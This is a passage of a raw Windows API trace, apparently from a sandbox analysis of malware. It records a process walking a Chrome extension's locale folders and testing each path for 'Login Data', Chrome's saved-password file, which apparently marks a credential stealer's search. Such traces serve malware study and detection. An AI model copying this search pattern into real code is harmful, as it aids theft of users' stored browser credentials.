returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" [0161.569] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.569] GetProcessHeap () returned 0x8e0000 [0161.569] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.569] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json", lpSrch="Login Data") returned 0x0 [0161.569] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.569] GetProcessHeap () returned 0x8e0000 [0161.569] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.569] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a43460, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.569] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.569] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.569] GetProcessHeap () returned 0x8e0000 [0161.569] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.569] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.569] GetProcessHeap () returned 0x8e0000 [0161.569] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.569] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ko", cAlternateFileName="")) returned 1 [0161.569] lstrcmpiW (lpString1="ko", lpString2=".") returned 1 [0161.569] lstrcmpiW (lpString1="ko", lpString2="..") returned 1 [0161.570] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.570] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.570] lstrlenW (lpString="\\") returned 1 [0161.570] GetProcessHeap () returned 0x8e0000 [0161.570] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.570] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.570] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.570] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.570] lstrlenW (lpString="ko") returned 2 [0161.570] GetProcessHeap () returned 0x8e0000 [0161.570] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.570] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.570] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" [0161.570] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.570] GetProcessHeap () returned 0x8e0000 [0161.570] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.570] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned 137 [0161.570] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned 137 [0161.570] lstrlenW (lpString="\\*.*") returned 4 [0161.570] GetProcessHeap () returned 0x8e0000 [0161.570] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.570] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" [0161.570] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*.*" [0161.570] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.571] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.571] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.571] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.571] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.571] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.571] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned 137 [0161.571] lstrlenW (lpString="\\") returned 1 [0161.571] GetProcessHeap () returned 0x8e0000 [0161.571] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.571] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" [0161.571] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\" [0161.571] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\") returned 138 [0161.571] lstrlenW (lpString="messages.json") returned 13 [0161.571] GetProcessHeap () returned 0x8e0000 [0161.571] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.571] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\" [0161.571] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" [0161.571] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.571] GetProcessHeap () returned 0x8e0000 [0161.571] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.571] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json", lpSrch="Login Data") returned 0x0 [0161.572] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.572] GetProcessHeap () returned 0x8e0000 [0161.572] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.572] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.572] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.572] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.572] GetProcessHeap () returned 0x8e0000 [0161.572] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.572] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.572] GetProcessHeap () returned 0x8e0000 [0161.572] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.572] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="lt", cAlternateFileName="")) returned 1 [0161.572] lstrcmpiW (lpString1="lt", lpString2=".") returned 1 [0161.572] lstrcmpiW (lpString1="lt", lpString2="..") returned 1 [0161.572] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.572] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.572] lstrlenW (lpString="\\") returned 1 [0161.572] GetProcessHeap () returned 0x8e0000 [0161.572] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.572] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.572] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.572] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.572] lstrlenW (lpString="lt") returned 2 [0161.572] GetProcessHeap () returned 0x8e0000 [0161.572] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.572] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.572] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" [0161.572] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.572] GetProcessHeap () returned 0x8e0000 [0161.572] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.572] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned 137 [0161.572] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned 137 [0161.572] lstrlenW (lpString="\\*.*") returned 4 [0161.573] GetProcessHeap () returned 0x8e0000 [0161.573] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.573] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" [0161.573] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*.*" [0161.573] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.573] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.573] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.573] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.573] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.573] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.573] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned 137 [0161.573] lstrlenW (lpString="\\") returned 1 [0161.573] GetProcessHeap () returned 0x8e0000 [0161.573] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.573] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 